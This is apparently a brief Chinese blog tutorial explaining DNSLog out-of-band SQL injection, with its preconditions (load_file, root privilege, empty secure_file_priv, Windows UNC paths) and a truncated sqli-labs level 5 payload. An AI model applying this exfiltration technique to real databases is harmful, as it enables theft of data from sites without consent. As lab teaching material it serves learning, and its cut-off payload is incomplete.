sql 注入 Dnslog

sql 注入 Dnslog

DNSLog注入原理

通常我们面对SQL注入过程中没有回显的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。

利用条件

sql注入dnslog 使用 load_file() 函数,所以需要root权限

secure_file_priv 需要为空,不然load_file利用失败

服务器要为Windows操作系统。\\xxx.com 用来解析域的,所以必须Windows操作系统。

案例

sqlibs 第5关

sql 注入 Dnslog_第1张图片

?id=1' and (select load_file(concat('\\\\'

你可能感兴趣的:(优秀文章,sql,数据库)